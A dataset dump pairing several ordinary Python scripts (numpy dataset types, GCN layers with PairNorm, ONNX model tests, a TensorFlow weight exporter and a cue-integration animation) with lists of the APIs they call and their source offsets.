code (string, 31 – 1.05M chars) | apis (list) | extract_api (string, 97 – 1.91M chars)
---|---|---|
from typing import Tuple, Type
import numpy as np
from pyjackson.core import ArgList, Field
from pyjackson.generics import Serializer
from ebonite.core.analyzer.base import CanIsAMustHookMixin, TypeHookMixin
from ebonite.core.analyzer.dataset import DatasetHook
from ebonite.core.objects.dataset_type import DatasetType
from ebonite.runtime.interface.typing import ListTypeWithSpec, SizedTypedListType
def _python_type_from_np_string_repr(string_repr: str) -> type:
np_type = _np_type_from_string(string_repr)
return _python_type_from_np_type(np_type)
def _python_type_from_np_type(np_type: Type):
value = np_type()
if np_type.__module__ == 'numpy':
value = value.item()
return type(value)
def _np_type_from_string(string_repr):
try:
return getattr(np, string_repr)
except AttributeError:
raise ValueError('Unknown numpy type {}'.format(string_repr))
class NumpyNumberDatasetType(DatasetType):
"""
:class:`.DatasetType` implementation for `numpy.number` objects which
converts them to built-in Python numbers and vice versa.
:param dtype: `numpy.number` data type as string
"""
type = 'numpy_number'
def __init__(self, dtype: str):
self.dtype = dtype
def get_spec(self) -> ArgList:
return [Field(None, self.actual_type, False)]
def deserialize(self, obj: dict) -> object:
return self.actual_type(obj)
def serialize(self, instance: np.number) -> object:
return instance.item()
@property
def actual_type(self):
return _np_type_from_string(self.dtype)
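# Illustrative usage sketch (added note, not part of the original module):
# round-tripping a numpy scalar through NumpyNumberDatasetType.
#
#   >>> dt = NumpyNumberDatasetType('float64')
#   >>> payload = dt.serialize(np.float64(1.5))   # -> 1.5, a built-in float
#   >>> dt.deserialize(payload)                    # -> np.float64(1.5)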
class NumpyNumberHook(CanIsAMustHookMixin, DatasetHook):
"""
:class:`.DatasetHook` implementation for `numpy.number` objects which uses :class:`NumpyNumberDatasetType`.
"""
def must_process(self, obj) -> bool:
return isinstance(obj, np.number)
def process(self, obj: np.number) -> DatasetType:
return NumpyNumberDatasetType(obj.dtype.name)
class NumpyNdarrayHook(TypeHookMixin, DatasetHook):
"""
:class:`.DatasetHook` implementation for `np.ndarray` objects which uses :class:`NumpyNdarrayDatasetType`
"""
valid_types = [np.ndarray]
def process(self, obj) -> DatasetType:
return NumpyNdarrayDatasetType(obj.shape, obj.dtype.name)
class NumpyDTypeSerializer(Serializer):
"""
PyJackson :class:`.Serializer` for `numpy` data types: stores types in JSON as their names.
"""
def deserialize(self, obj: str):
return getattr(np, obj)
def serialize(self, instance) -> str:
return str(instance)
class NumpyNdarrayDatasetType(DatasetType, ListTypeWithSpec):
"""
:class:`.DatasetType` implementation for `np.ndarray` objects
which converts them to built-in Python lists and vice versa.
:param shape: shape of `numpy.ndarray` objects in dataset
:param dtype: data type of `numpy.ndarray` objects in dataset
"""
real_type = np.ndarray
type = 'numpy_ndarray'
def __init__(self, shape: Tuple[int, ...], dtype: str):
# TODO assert shape and dtypes len
self.shape = shape
self.dtype = dtype
@property
def size(self):
if len(self.shape) == 1:
return 1
else:
return self.shape[0] # TODO more dimensions
def list_size(self):
return self.shape[0]
def _get_subtype(self, shape):
if len(shape) == 0:
return _python_type_from_np_string_repr(self.dtype)
elif len(shape) == 1:
subtype = _python_type_from_np_string_repr(self.dtype)
else:
subtype = self._get_subtype(shape[1:])
return SizedTypedListType(shape[0], subtype)
def get_spec(self) -> ArgList:
return [Field(None, self._get_subtype(self.shape[1:]), False)]
def deserialize(self, obj):
return np.array(obj)
def serialize(self, instance: np.ndarray):
# if self.shape == 1:
# return [instance.tolist()] # TODO better shapes
return instance.tolist()
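# Illustrative usage sketch (added note, not part of the original module):
# a 2x3 ndarray is serialized to nested Python lists and restored with np.array.
#
#   >>> dt = NumpyNdarrayDatasetType(shape=(2, 3), dtype='int64')
#   >>> data = dt.serialize(np.arange(6).reshape(2, 3))   # -> [[0, 1, 2], [3, 4, 5]]
#   >>> dt.deserialize(data).shape                        # -> (2, 3)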
|
[
"numpy.array",
"pyjackson.core.Field",
"ebonite.runtime.interface.typing.SizedTypedListType"
] |
[((3677, 3714), 'ebonite.runtime.interface.typing.SizedTypedListType', 'SizedTypedListType', (['shape[0]', 'subtype'], {}), '(shape[0], subtype)\n', (3695, 3714), False, 'from ebonite.runtime.interface.typing import ListTypeWithSpec, SizedTypedListType\n'), ((3870, 3883), 'numpy.array', 'np.array', (['obj'], {}), '(obj)\n', (3878, 3883), True, 'import numpy as np\n'), ((1304, 1340), 'pyjackson.core.Field', 'Field', (['None', 'self.actual_type', '(False)'], {}), '(None, self.actual_type, False)\n', (1309, 1340), False, 'from pyjackson.core import ArgList, Field\n')]
|
# Copyright 2021 <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "1"
import argparse
import numpy as np
from python.input.MNIST_input_pipeline import MNIST
from python.input.cifar10_input_pipeline import Cifar10
from python.input.cifar100_input_pipeline import Cifar100
from python.input.smallNORB_input_pipeline import smallNORB
from python.models.BranchingMerging import SmallImageBranchingMerging
import tensorflow as tf
def go(data_dir, log_dir, output_file, input_pipeline, merge_strategy,
use_hvcs=True, hvc_type=1, hvc_dims=None, total_convolutions=None,
branches_after=None):
files = []
for dirname, _, filenames in os.walk(log_dir):
file = list(set([os.path.join(dirname,
os.path.splitext(fn)[0]) for fn in filenames]))
if len(file) > 0:
files.append(file[0])
if input_pipeline == 3:
in_pipe = Cifar10(data_dir, False, 0)
elif input_pipeline == 4:
in_pipe = Cifar100(data_dir, False, 0)
elif input_pipeline == 5:
in_pipe = smallNORB(data_dir, False, 48, 32)
else:
in_pipe = MNIST(data_dir, False, 1)
branch_weights = []
strategy = tf.distribute.MirroredStrategy()
with strategy.scope():
print("Building model...")
model = SmallImageBranchingMerging(in_pipe.get_class_count(),
in_pipe.get_image_size(), in_pipe.get_image_channels(),
merge_strategy, use_hvcs, hvc_type, hvc_dims,
total_convolutions, branches_after, False)
for weights_file in files:
print("Restoring weights file: {}".format(weights_file))
ckpt = tf.train.Checkpoint(
vars=model.get_all_savable_variables())
ckpt.restore(weights_file).expect_partial()
branch_weights.append(model.branch_weights.variable.numpy())
print("Saving final branch weights...")
# (False Positive)
# noinspection PyTypeChecker
np.savetxt(output_file, np.array(branch_weights), delimiter=',', fmt='%0f')
print("Finished.")
################################################################################
if __name__ == "__main__":
p = argparse.ArgumentParser()
p.add_argument("--data_dir", default=r"../../../../Datasets/smallNORB_data")
p.add_argument("--log_dir", default=r"../../logs/20210609135430")
p.add_argument("--output_file",
default=r"../../logs/20210609135430/final_branch_weights.txt")
p.add_argument("--input_pipeline", default=5, type=int)
p.add_argument("--merge_strategy", default=2, type=float)
p.add_argument("--use_hvcs", default=True, type=bool)
p.add_argument("--hvc_type", default=2, type=int)
p.add_argument("--hvc_dims", default=[96, 144, 192], type=int)
p.add_argument("--total_convolutions", default=11, type=int)
p.add_argument("--branches_after", default=[4, 7, 10])
a = p.parse_args()
go(data_dir=a.data_dir, log_dir=a.log_dir, output_file=a.output_file,
input_pipeline=a.input_pipeline, merge_strategy=a.merge_strategy,
use_hvcs=a.use_hvcs, hvc_type=a.hvc_type, hvc_dims=a.hvc_dims,
total_convolutions=a.total_convolutions, branches_after=a.branches_after)
|
[
"argparse.ArgumentParser",
"python.input.cifar100_input_pipeline.Cifar100",
"os.path.splitext",
"numpy.array",
"python.input.cifar10_input_pipeline.Cifar10",
"python.input.smallNORB_input_pipeline.smallNORB",
"tensorflow.distribute.MirroredStrategy",
"python.input.MNIST_input_pipeline.MNIST",
"os.walk"
] |
[((1302, 1318), 'os.walk', 'os.walk', (['log_dir'], {}), '(log_dir)\n', (1309, 1318), False, 'import os\n'), ((1817, 1849), 'tensorflow.distribute.MirroredStrategy', 'tf.distribute.MirroredStrategy', ([], {}), '()\n', (1847, 1849), True, 'import tensorflow as tf\n'), ((2845, 2870), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2868, 2870), False, 'import argparse\n'), ((1534, 1561), 'python.input.cifar10_input_pipeline.Cifar10', 'Cifar10', (['data_dir', '(False)', '(0)'], {}), '(data_dir, False, 0)\n', (1541, 1561), False, 'from python.input.cifar10_input_pipeline import Cifar10\n'), ((2652, 2676), 'numpy.array', 'np.array', (['branch_weights'], {}), '(branch_weights)\n', (2660, 2676), True, 'import numpy as np\n'), ((1610, 1638), 'python.input.cifar100_input_pipeline.Cifar100', 'Cifar100', (['data_dir', '(False)', '(0)'], {}), '(data_dir, False, 0)\n', (1618, 1638), False, 'from python.input.cifar100_input_pipeline import Cifar100\n'), ((1687, 1721), 'python.input.smallNORB_input_pipeline.smallNORB', 'smallNORB', (['data_dir', '(False)', '(48)', '(32)'], {}), '(data_dir, False, 48, 32)\n', (1696, 1721), False, 'from python.input.smallNORB_input_pipeline import smallNORB\n'), ((1750, 1775), 'python.input.MNIST_input_pipeline.MNIST', 'MNIST', (['data_dir', '(False)', '(1)'], {}), '(data_dir, False, 1)\n', (1755, 1775), False, 'from python.input.MNIST_input_pipeline import MNIST\n'), ((1379, 1399), 'os.path.splitext', 'os.path.splitext', (['fn'], {}), '(fn)\n', (1395, 1399), False, 'import os\n')]
|
import torch, math, copy
import scipy.sparse as sp
import numpy as np
from torch.nn.modules.module import Module
import torch.nn as nn
from torch.nn.parameter import Parameter
def normalize(adj, device='cpu'):
if isinstance(adj, torch.Tensor):
adj_ = adj.to(device)
elif isinstance(adj, sp.csr_matrix):
adj_ = torch.from_numpy(adj.toarray()).float().to(device)
elif isinstance(adj, np.ndarray):
adj_ = torch.from_numpy(adj).float().to(device)
else:
adj_ = adj.to(device)
adj_ = adj_ + torch.eye(adj_.shape[0]).to(device)
rowsum = adj_.sum(1)
degree_mat_inv_sqrt = torch.diag(torch.pow(rowsum, -0.5).flatten())
degree_mat_sqrt = torch.diag(torch.pow(rowsum, -0.5).flatten())
adj_normalized = torch.mm(torch.spmm(degree_mat_inv_sqrt, adj_), degree_mat_sqrt)
# return torch.from_numpy(adj_normalized).float().to(device_
return adj_normalized
def coo_to_csp(sp_coo):
num = sp_coo.shape[0]
row = sp_coo.row
col = sp_coo.col
sp_tensor = torch.sparse.FloatTensor(torch.LongTensor(np.stack([row, col])),
torch.tensor(sp_coo.data),
torch.Size([num, num]))
return sp_tensor
#def sp_diag(sp_tensor):
# sp_tensor = sp_tensor.to_dense()
# sp_array = sp_tensor.to('cpu').numpy()
# sp_diags = sp.diags(sp_array).tocoo()
# return coo_to_csp(sp_diags)
def sp_normalize(adj_def, device='cpu'):
"""
:param adj: scipy.sparse.coo_matrix
:param device: default as cpu
:return: normalized_adj:
"""
adj_ = sp.coo_matrix(adj_def)
adj_ = adj_ + sp.coo_matrix(sp.eye(adj_def.shape[0]), dtype=np.float32)
rowsum = np.array(adj_.sum(axis=1)).reshape(-1)
norm_unit = np.float_power(rowsum, -0.5).astype(np.float32)
degree_mat_inv_sqrt = sp.diags(norm_unit)
degree_mat_sqrt = copy.copy(degree_mat_inv_sqrt)
# degree_mat_sqrt = degree_mat_inv_sqrt.to_dense()
support = adj_.__matmul__(degree_mat_sqrt)
# support = coo_to_csp(support.tocoo())
# degree_mat_inv_sqrt = coo_to_csp(degree_mat_inv_sqrt.tocoo())
adj_normalized = degree_mat_inv_sqrt.__matmul__(support)
adj_normalized = coo_to_csp(adj_normalized.tocoo())
return adj_normalized, rowsum
# coo_adj = sp.coo_matrix(adj_normalized.to('cpu').numpy())
# return coo_to_csp(coo_adj).to(device), rowsum
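# Note (added for clarity, not in the original source): both normalize() and
# sp_normalize() build the symmetrically normalized adjacency commonly used by GCNs,
#   A_hat = D^{-1/2} (A + I) D^{-1/2},
# where D is the degree matrix of A + I. A rough sanity check, assuming a small
# scipy.sparse input:
#
#   >>> adj = sp.coo_matrix(np.array([[0, 1], [1, 0]], dtype=np.float32))
#   >>> a_hat, deg = sp_normalize(adj)
#   >>> a_hat.to_dense()   # approximately [[0.5, 0.5], [0.5, 0.5]]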
class PairNorm(nn.Module):
def __init__(self, mode='PN', scale=1):
"""
mode:
'None' : No normalization
'PN' : Original version
'PN-SI' : Scale-Individually version
'PN-SCS' : Scale-and-Center-Simultaneously version
('SCS'-mode is not in the paper but we found it works well in practice,
especially for GCN and GAT.)
PairNorm is typically used after each graph convolution operation.
"""
assert mode in ['None', 'PN', 'PN-SI', 'PN-SCS']
super(PairNorm, self).__init__()
self.mode = mode
self.scale = scale
        # Scale can be set based on original data, and also the current feature lengths.
# We leave the experiments to future. A good pool we used for choosing scale:
# [0.1, 1, 10, 50, 100]
def forward(self, x):
if self.mode == 'None':
return x
col_mean = x.mean(dim=0)
if self.mode == 'PN':
x = x - col_mean
rownorm_mean = (1e-6 + x.pow(2).sum(dim=1).mean()).sqrt()
x = self.scale * x / rownorm_mean
if self.mode == 'PN-SI':
x = x - col_mean
rownorm_individual = (1e-6 + x.pow(2).sum(dim=1, keepdim=True)).sqrt()
x = self.scale * x / rownorm_individual
if self.mode == 'PN-SCS':
rownorm_individual = (1e-6 + x.pow(2).sum(dim=1, keepdim=True)).sqrt()
x = self.scale * x / rownorm_individual - col_mean
return x
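# Illustrative usage sketch (added note, not part of the original source): PairNorm
# is applied to node features after a graph-convolution step, e.g.
#
#   >>> pn = PairNorm(mode='PN', scale=1)
#   >>> h = torch.randn(5, 16)   # 5 nodes, 16-dim features
#   >>> pn(h).shape              # -> torch.Size([5, 16])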
class GraphConvolution(Module):
"""
Simple GCN layer, similar to https://arxiv.org/abs/1609.02907
"""
def __init__(self, in_features, out_features, bias=True, mode='None', act=lambda x: x):
super(GraphConvolution, self).__init__()
self.in_features = in_features
self.out_features = out_features
self.weight = Parameter(torch.FloatTensor(in_features, out_features))
self.pn = PairNorm(mode=mode)
self.act = act
if bias:
self.bias = Parameter(torch.FloatTensor(out_features))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
stdv = 1. / math.sqrt(self.weight.size(1))
self.weight.data.uniform_(-stdv, stdv)
if self.bias is not None:
self.bias.data.uniform_(-stdv, stdv)
def forward(self, input, adj):
support = torch.mm(input, self.weight)
output = torch.mm(adj, support)
if self.bias is not None:
output = output + self.bias
return self.act(self.pn(output))
def __repr__(self):
return self.__class__.__name__ + ' (' \
+ str(self.in_features) + ' -> ' \
+ str(self.out_features) + ')'
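# Illustrative usage sketch (added note, not part of the original source): a single
# GraphConvolution layer applied to a (pre-normalized) adjacency matrix.
#
#   >>> adj = torch.eye(2)                      # stand-in for a normalized adjacency
#   >>> gc = GraphConvolution(in_features=4, out_features=2, mode='PN')
#   >>> x = torch.randn(2, 4)                   # 2 nodes, 4 input features
#   >>> gc(x, adj).shape                        # -> torch.Size([2, 2])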
|
[
"scipy.sparse.eye",
"torch.eye",
"torch.FloatTensor",
"torch.pow",
"torch.from_numpy",
"torch.mm",
"torch.tensor",
"numpy.stack",
"scipy.sparse.coo_matrix",
"torch.spmm",
"scipy.sparse.diags",
"copy.copy",
"torch.Size",
"numpy.float_power"
] |
[((1654, 1676), 'scipy.sparse.coo_matrix', 'sp.coo_matrix', (['adj_def'], {}), '(adj_def)\n', (1667, 1676), True, 'import scipy.sparse as sp\n'), ((1899, 1918), 'scipy.sparse.diags', 'sp.diags', (['norm_unit'], {}), '(norm_unit)\n', (1907, 1918), True, 'import scipy.sparse as sp\n'), ((1942, 1972), 'copy.copy', 'copy.copy', (['degree_mat_inv_sqrt'], {}), '(degree_mat_inv_sqrt)\n', (1951, 1972), False, 'import torch, math, copy\n'), ((791, 828), 'torch.spmm', 'torch.spmm', (['degree_mat_inv_sqrt', 'adj_'], {}), '(degree_mat_inv_sqrt, adj_)\n', (801, 828), False, 'import torch, math, copy\n'), ((1164, 1189), 'torch.tensor', 'torch.tensor', (['sp_coo.data'], {}), '(sp_coo.data)\n', (1176, 1189), False, 'import torch, math, copy\n'), ((1233, 1255), 'torch.Size', 'torch.Size', (['[num, num]'], {}), '([num, num])\n', (1243, 1255), False, 'import torch, math, copy\n'), ((5022, 5050), 'torch.mm', 'torch.mm', (['input', 'self.weight'], {}), '(input, self.weight)\n', (5030, 5050), False, 'import torch, math, copy\n'), ((5069, 5091), 'torch.mm', 'torch.mm', (['adj', 'support'], {}), '(adj, support)\n', (5077, 5091), False, 'import torch, math, copy\n'), ((1099, 1119), 'numpy.stack', 'np.stack', (['[row, col]'], {}), '([row, col])\n', (1107, 1119), True, 'import numpy as np\n'), ((1710, 1734), 'scipy.sparse.eye', 'sp.eye', (['adj_def.shape[0]'], {}), '(adj_def.shape[0])\n', (1716, 1734), True, 'import scipy.sparse as sp\n'), ((1824, 1852), 'numpy.float_power', 'np.float_power', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (1838, 1852), True, 'import numpy as np\n'), ((4451, 4495), 'torch.FloatTensor', 'torch.FloatTensor', (['in_features', 'out_features'], {}), '(in_features, out_features)\n', (4468, 4495), False, 'import torch, math, copy\n'), ((556, 580), 'torch.eye', 'torch.eye', (['adj_.shape[0]'], {}), '(adj_.shape[0])\n', (565, 580), False, 'import torch, math, copy\n'), ((656, 679), 'torch.pow', 'torch.pow', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (665, 679), False, 'import torch, math, copy\n'), ((725, 748), 'torch.pow', 'torch.pow', (['rowsum', '(-0.5)'], {}), '(rowsum, -0.5)\n', (734, 748), False, 'import torch, math, copy\n'), ((4613, 4644), 'torch.FloatTensor', 'torch.FloatTensor', (['out_features'], {}), '(out_features)\n', (4630, 4644), False, 'import torch, math, copy\n'), ((454, 475), 'torch.from_numpy', 'torch.from_numpy', (['adj'], {}), '(adj)\n', (470, 475), False, 'import torch, math, copy\n')]
|
#*
#* Copyright (C) 2017-2019 Alibaba Group Holding Limited
#*
#* Licensed under the Apache License, Version 2.0 (the "License");
#* you may not use this file except in compliance with the License.
#* You may obtain a copy of the License at
#*
#* http://www.apache.org/licenses/LICENSE-2.0
#*
#* Unless required by applicable law or agreed to in writing, software
#* distributed under the License is distributed on an "AS IS" BASIS,
#* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#* See the License for the specific language governing permissions and
#* limitations under the License.
import numpy as np
import onnx
import os
import glob
import caffe2.python.onnx.backend
from caffe2.python import core, workspace
from onnx import numpy_helper
import os
fail_sum = 0
dir_path = os.path.dirname(os.path.realpath(__file__))
test_dir = glob.glob(os.path.join(dir_path, 'test_*'))
model_paths = glob.glob(os.path.join(os.path.join(dir_path, 'test_*'), '*.onnx'))
m_len = len(model_paths)
for k in range(m_len):
model = onnx.load(model_paths[k])
test_data_dir = os.path.join(test_dir[k], 'test_data_set_0')
# Load inputs
inputs = []
inputs_num = len(glob.glob(os.path.join(test_data_dir, 'input_*.pb')))
for i in range(inputs_num):
input_file = os.path.join(test_data_dir, 'input_{}.pb'.format(i))
tensor = onnx.TensorProto()
with open(input_file, 'rb') as f:
tensor.ParseFromString(f.read())
inputs.append(numpy_helper.to_array(tensor))
# Load reference outputs
ref_outputs = []
ref_outputs_num = len(glob.glob(os.path.join(test_data_dir, 'output_*.pb')))
for j in range(ref_outputs_num):
output_file = os.path.join(test_data_dir, 'output_{}.pb'.format(j))
tensor = onnx.TensorProto()
with open(output_file, 'rb') as f:
tensor.ParseFromString(f.read())
ref_outputs.append(numpy_helper.to_array(tensor))
# Run the model on the backend
try:
outputs = list(caffe2.python.onnx.backend.run_model(model, inputs))
except RuntimeError:
print("!!Error: Model execution of " + test_dir[k] + " failed.")
fail_sum = fail_sum + 1
continue
idx = 0
# Results verification with golden data.
for ref_o, o in zip(ref_outputs, outputs):
try:
np.testing.assert_almost_equal(ref_o, o, decimal=5, err_msg="Failed test: " + test_dir[k])
except AssertionError:
print("!!Error: Output " + str(idx) + " of test: " + test_dir[k] + " failed")
fail_sum = fail_sum + 1
idx = idx + 1
print("============Summary:=============")
print(str(m_len) + " tests in total.")
print(str(m_len - fail_sum) + " tests passed.")
print(str(fail_sum) + " tests failed.")
print("=================================")
|
[
"os.path.join",
"os.path.realpath",
"onnx.TensorProto",
"numpy.testing.assert_almost_equal",
"onnx.load",
"onnx.numpy_helper.to_array"
] |
[((831, 857), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (847, 857), False, 'import os\n'), ((880, 912), 'os.path.join', 'os.path.join', (['dir_path', '"""test_*"""'], {}), "(dir_path, 'test_*')\n", (892, 912), False, 'import os\n'), ((1054, 1079), 'onnx.load', 'onnx.load', (['model_paths[k]'], {}), '(model_paths[k])\n', (1063, 1079), False, 'import onnx\n'), ((1098, 1142), 'os.path.join', 'os.path.join', (['test_dir[k]', '"""test_data_set_0"""'], {}), "(test_dir[k], 'test_data_set_0')\n", (1110, 1142), False, 'import os\n'), ((951, 983), 'os.path.join', 'os.path.join', (['dir_path', '"""test_*"""'], {}), "(dir_path, 'test_*')\n", (963, 983), False, 'import os\n'), ((1364, 1382), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (1380, 1382), False, 'import onnx\n'), ((1767, 1785), 'onnx.TensorProto', 'onnx.TensorProto', ([], {}), '()\n', (1783, 1785), False, 'import onnx\n'), ((1203, 1244), 'os.path.join', 'os.path.join', (['test_data_dir', '"""input_*.pb"""'], {}), "(test_data_dir, 'input_*.pb')\n", (1215, 1244), False, 'import os\n'), ((1486, 1515), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['tensor'], {}), '(tensor)\n', (1507, 1515), False, 'from onnx import numpy_helper\n'), ((1598, 1640), 'os.path.join', 'os.path.join', (['test_data_dir', '"""output_*.pb"""'], {}), "(test_data_dir, 'output_*.pb')\n", (1610, 1640), False, 'import os\n'), ((1895, 1924), 'onnx.numpy_helper.to_array', 'numpy_helper.to_array', (['tensor'], {}), '(tensor)\n', (1916, 1924), False, 'from onnx import numpy_helper\n'), ((2301, 2395), 'numpy.testing.assert_almost_equal', 'np.testing.assert_almost_equal', (['ref_o', 'o'], {'decimal': '(5)', 'err_msg': "('Failed test: ' + test_dir[k])"}), "(ref_o, o, decimal=5, err_msg='Failed test: ' +\n test_dir[k])\n", (2331, 2395), True, 'import numpy as np\n')]
|
"""
animation.py
This script is used to produce animations of population behaviour
over a range of changing conditions. For example, if we wanted to
see how a population would change as light was elevated and wind
kept constant, we could produce the animation and watch the
general trend. This was mostly useful for visualisation, less for
formal analysis.
The script first constructs a series of Treatments which will be
simulated. The simulations are then run, each simulation produces
a plot which is stored in a target directory. These frames can
then be stitched together using a suitable tool, such as ffmpeg.
Note: the script is written for changing light elevations but
it should be reasonably straightforward to modify it for changing
other variables.
"""
from util.deserialiser import Deserialiser
from util.integration_models import *
from util.treatment import Treatment
from util.models import ReliabilityModel
from world.light import Light
from world.wind import Wind
import definitions as defn
import matplotlib.pyplot as plt
from scipy.special import i0
import numpy as np
import os
import shutil
def main():
#
# Simulator - can be anything in the util/integration_models module
#
simulator = CMLE()
rel_model = ReliabilityModel()
#
# Set the target output directory
#
os.chdir("frames/BWS")
print(os.getcwd())
start = 30 # Start elevation in degrees
end = 90 # End elevation
increment = 1 # Adjustment increment in degrees
iterations = 15 # Number of simulations to run at each elevation
    treatment_n = 30   # Number of individuals per treatment
elevation = np.radians(start)
filenumber = 0
wind_speed = 2.5 # Wind speed for each trial (this is assumed to be constant)
# While elevation still in range
while elevation < np.radians(end):
#
# Create the requisite treatment
#
treatment = Treatment()
treatment.set_reliability_model(rel_model)
        treatment.set_n(treatment_n)
treatment.set_id("Elevation {:.01f} degrees".format(np.degrees(elevation)))
init_light = Light(elevation, np.radians(0), treatment)
init_wind = Wind(wind_speed, np.radians(0), treatment)
initial = [init_wind, init_light]
conf_light = Light(elevation, np.radians(0), treatment)
conf_wind = Wind(wind_speed, np.radians(120), treatment)
conflict = [conf_wind, conf_light]
treatment.set_initial_cues(initial)
treatment.set_conflict_cues(conflict)
#
# Simulate the current treatment for some number of iterations.
#
for n in range(iterations):
#
# The filename format string is set to produce regular filenames
# which can easily be stitched into a video using ffmpeg. This can
# be modified.
#
filename = "{:05d}.png".format(filenumber)
simulator.simulate_treatment(treatment)
#
# Plot production
#
changes = treatment.get_changes_in_bearing()
avg_r, avg_t = treatment.get_avg_change()
plt.tight_layout()
ax = plt.subplot(121, projection='polar')
ax.plot(changes, np.ones(len(changes)), 'bo', color='magenta', alpha=0.2)
ax.plot(avg_t, avg_r, 'ro', markeredgecolor='k', label="R={:.02f},T={:.01f}".format(avg_r, np.degrees(avg_t)))
ax.set_title(treatment.get_id())
ax.set_rlim(0,1.1)
ax.set_theta_zero_location("N")
ax.set_theta_direction(-1)
ax.legend(loc='lower left')
params = treatment.get_cue_distribution_parameters()
initial_dist_ax = plt.subplot(222)
initial_light = params["initial"][0]
initial_wind = params["initial"][1]
light_mu = initial_light[0]
wind_mu = initial_wind[0]
light_kappa = initial_light[1]
wind_kappa = initial_wind[1]
light_x = np.linspace(-np.pi, np.pi, num=100)
light_y = np.exp(light_kappa*np.cos(light_x - light_mu))/(2*np.pi*i0(light_kappa))
wind_x = np.linspace(-np.pi, np.pi, num=100)
wind_y = np.exp(wind_kappa*np.cos(wind_x - wind_mu))/(2*np.pi*i0(wind_kappa))
initial_dist_ax.plot(np.degrees(light_x), light_y,
color='green',
label="Light: kappa={:.02f}".format(light_kappa)
)
initial_dist_ax.plot(np.degrees(wind_x),
wind_y,
color='blue',
label="Wind: kappa={:.02f}".format(wind_kappa))
initial_dist_ax.set_ylim([0,1])
initial_dist_ax.legend()
initial_dist_ax.set_title("Initial cue probability density")
initial_dist_ax.set_ylabel("Probability density")
conflict_dist_ax = plt.subplot(224)
conflict_light = params["conflict"][0]
conflict_wind = params["conflict"][1]
light_mu = conflict_light[0]
wind_mu = conflict_wind[0]
light_kappa = conflict_light[1]
wind_kappa = conflict_wind[1]
light_x = np.linspace(-np.pi, np.pi, num=100)
light_y = np.exp(light_kappa*np.cos(light_x - light_mu))/(2*np.pi*i0(light_kappa))
wind_x = np.linspace(-np.pi, np.pi, num=100)
wind_y = np.exp(wind_kappa*np.cos(wind_x - wind_mu))/(2*np.pi*i0(wind_kappa))
conflict_dist_ax.plot(np.degrees(light_x), light_y,
color='green',
label="Light: kappa={:.02f}".format(light_kappa)
)
conflict_dist_ax.plot(np.degrees(wind_x),
wind_y, color='blue',
label="Wind: kappa={:.02f}".format(wind_kappa))
conflict_dist_ax.set_ylim([0,1])
conflict_dist_ax.set_xlim([-180,180])
conflict_dist_ax.set_title("Conflict cue probability distributions")
conflict_dist_ax.set_xlabel("Degrees")
conflict_dist_ax.set_ylabel("Probability density")
# Bin data into 360/nbins degree bins to plot the population mass
nbins = 72
ch_hist = np.histogram(np.degrees(changes), np.linspace(-180, 180, nbins + 1))[0]
ch_hist_norm = ch_hist / sum(ch_hist)
# Plot population response alongside the cue distributions
plt.bar(np.linspace(-180, 180, nbins),
ch_hist_norm, width=360/nbins,
color='magenta',edgecolor='k', alpha=0.5,
label='Population response')
conflict_dist_ax.legend()
plt.gcf().set_size_inches(16,10)
plt.savefig(filename)
plt.clf()
# Loop admin
filenumber+=1
elevation+=np.radians(increment)
if __name__ == '__main__':
main()
|
[
"numpy.radians",
"util.treatment.Treatment",
"matplotlib.pyplot.savefig",
"matplotlib.pyplot.gcf",
"matplotlib.pyplot.clf",
"os.getcwd",
"os.chdir",
"matplotlib.pyplot.subplot",
"numpy.linspace",
"scipy.special.i0",
"numpy.cos",
"matplotlib.pyplot.tight_layout",
"numpy.degrees",
"util.models.ReliabilityModel"
] |
[((1259, 1277), 'util.models.ReliabilityModel', 'ReliabilityModel', ([], {}), '()\n', (1275, 1277), False, 'from util.models import ReliabilityModel\n'), ((1333, 1355), 'os.chdir', 'os.chdir', (['"""frames/BWS"""'], {}), "('frames/BWS')\n", (1341, 1355), False, 'import os\n'), ((1651, 1668), 'numpy.radians', 'np.radians', (['start'], {}), '(start)\n', (1661, 1668), True, 'import numpy as np\n'), ((1366, 1377), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1375, 1377), False, 'import os\n'), ((1831, 1846), 'numpy.radians', 'np.radians', (['end'], {}), '(end)\n', (1841, 1846), True, 'import numpy as np\n'), ((1929, 1940), 'util.treatment.Treatment', 'Treatment', ([], {}), '()\n', (1938, 1940), False, 'from util.treatment import Treatment\n'), ((7032, 7053), 'numpy.radians', 'np.radians', (['increment'], {}), '(increment)\n', (7042, 7053), True, 'import numpy as np\n'), ((2152, 2165), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2162, 2165), True, 'import numpy as np\n'), ((2215, 2228), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2225, 2228), True, 'import numpy as np\n'), ((2322, 2335), 'numpy.radians', 'np.radians', (['(0)'], {}), '(0)\n', (2332, 2335), True, 'import numpy as np\n'), ((2385, 2400), 'numpy.radians', 'np.radians', (['(120)'], {}), '(120)\n', (2395, 2400), True, 'import numpy as np\n'), ((3177, 3195), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (3193, 3195), True, 'import matplotlib.pyplot as plt\n'), ((3213, 3249), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(121)'], {'projection': '"""polar"""'}), "(121, projection='polar')\n", (3224, 3249), True, 'import matplotlib.pyplot as plt\n'), ((3754, 3770), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(222)'], {}), '(222)\n', (3765, 3770), True, 'import matplotlib.pyplot as plt\n'), ((4053, 4088), 'numpy.linspace', 'np.linspace', (['(-np.pi)', 